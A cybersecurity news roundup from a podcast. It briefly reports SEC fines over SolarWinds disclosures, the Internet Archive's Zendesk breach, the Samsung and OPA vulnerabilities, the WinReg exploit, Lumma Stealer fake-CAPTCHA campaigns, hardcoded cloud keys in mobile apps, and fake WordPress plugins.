SolarWinds disclosure fines, Zendesk helps Internet Archive, Samsung zero-day
Subscribe to Cyber Security Headlines podcast
Spotify, Apple Podcasts, RSS link, add as an Alexa Skill, or search "Cyber Security Headlines" on your favorite podcast app.
In today’s cybersecurity news…
Four cyber companies fined for SolarWinds disclosure failures
On Tuesday, the Securities and Exchange Commission (SEC) announced fines totaling roughly $6 million against Check Point, Avaya, Unisys and Mimecast for their lackluster disclosures related to the 2020 SolarWinds Orion software compromise. The SEC said the companies made “materially misleading” disclosures related to the incident that further victimized shareholders and the investment community. The fines are the result of a years-long investigation into public companies potentially impacted by the SolarWinds compromise.
(The Record and TechCrunch)
Zendesk helps Internet Archive after hacker breached email system
Following up on a story we brought to you Monday on Cyber Security Headlines, the customer service platform Zendesk said Tuesday that it helped the Internet Archive resolve a breach it suffered over the weekend. The hacker took advantage of unsecured authentication tokens to access the Archive’s Zendesk system. They then sent emails to customers expressing their disappointment at the Archive’s failure to rotate its API keys despite being alerted to the issue two weeks earlier. A spokesperson from ZenDesk said while they helped the Archive secure its account, the ZenDesk platform itself was not compromised in the incident.
Samsung zero-day under active exploit
A zero-day vulnerability (CVE-2024-44068) has been discovered in Samsung’s mobile processors and is being used in an exploit chain for arbitrary code execution. NIST said the use-after-free bug is in the m2m scaler driver in Samsung Mobile and Wearable Processors (Exynos 9820, 9825, 980, 990, 850, and W920) and leads to privilege escalation. The vulnerability was rated critical and scored 8.1 out of 10 on the CVSS scale.? Samsung issued a patch along with its October set of security fixes.?
OPA for Windows vulnerability exposes credentials
Security firm Tenable has advised organizations using Open Policy Agent (OPA) for Windows to consider updating to v0.68.0 or later to protect against an authentication hash leakage vulnerability (CVE-2024-8260). The vulnerability stems from improper input validation, and allows attackers to trick OPA into accessing a malicious Server Message Block (SMB) share. From there, an attacker could steal Net-NTLMv2 hashed credentials and crack them or potentially relay them to authenticate to other systems. Tenable said the vulnerability highlights the risks organizations face when consuming open source software and code and, “underscores the need for collaboration between security and engineering teams to mitigate such risks.”
领英推荐
?(Dark Reading)
Thanks to today’s episode sponsor, SpyCloud
Exploit released for new Windows Server “WinReg” attack
Proof-of-concept exploit code is now public for a vulnerability in Microsoft’s Remote Registry client (CVE-2024-43532) that falls back to old transport protocols if SMB transport is not present. An attacker could use the issue to authenticate to Active Directory Certificate Services (ADCS) where they could then obtain a user certificate for further domain authentication. The flaw affects all Windows server versions 2008 through 2022 as well as Windows 10 and Windows 11. Akamai researcher Stiv Kupchik originally disclosed the issue back in February after which Microsoft dismissed the report as a documentation issue. In mid-June, Kupchik resubmitted the report with a better proof-of-concept (PoC) and explanation leading Microsoft to confirm the issue in early July and issue a fix earlier this month. Akamai provided methods of detecting vulnerable services and recommends orgs use Event Tracing for Windows (ETW) to monitor for related RPC calls.
Tricky CAPTCHA scheme is dropping Lumma Stealer?
Lumma Stealer, which operates as Malware-as-a-service (MaaS), is featured in a new campaign that uses malicious CAPTCHA pages to scam targets into clicking through the “verification” process. A security researcher from Qualys said,”When the user clicks the ‘I’m not a robot’ button, verification steps are presented.” Once the user completes these steps, a PowerShell command drops a malware downloader to the target machine. Previous Lumma Stealer campaigns have leveraged schemes from basic phishing campaigns to more sophisticated schemes on platforms like YouTube and Facebook.?
Cloud auth keys found in popular mobile apps?
Symantec has reported that multiple popular mobile applications for iOS and Android come with hardcoded, unencrypted credentials for cloud services like Amazon Web Services (AWS) and Microsoft Azure Blob Storage. Symantec says these keys are present in the apps’ codebases because of errors and bad practices during the development phase. Exposing these types of credentials can easily lead to unauthorized access to storage buckets and databases with sensitive user data. The exposed creds were found in at least thirteen apps including Pic Stitch, Meru Cabs, and Crumbl, which have registered more than 4 million downloads each.
Swarms of fake WordPress plug-ins infect sites with infostealers
Domain registrar GoDaddy is warning of a malware variant disguised as a fake browser update called “ClickFix.” Threat actors appear to have used stolen WordPress admin credentials to systematically generate the compromised plugins using a common template. This allows attackers to scale their malicious operations and add a layer of complexity for detection. GoDaddy claims to have been tracking ClickFix campaign since August 2023, spotting it on more than 25,000 compromised sites worldwide. ClickFix infected more than 6,000 WordPress sites in just a one-day period in early September. GoDaddy has not yet determined how the WordPress credentials were stolen but they have provided a long list of indicators of compromise (IoCs) associated with the campaign.?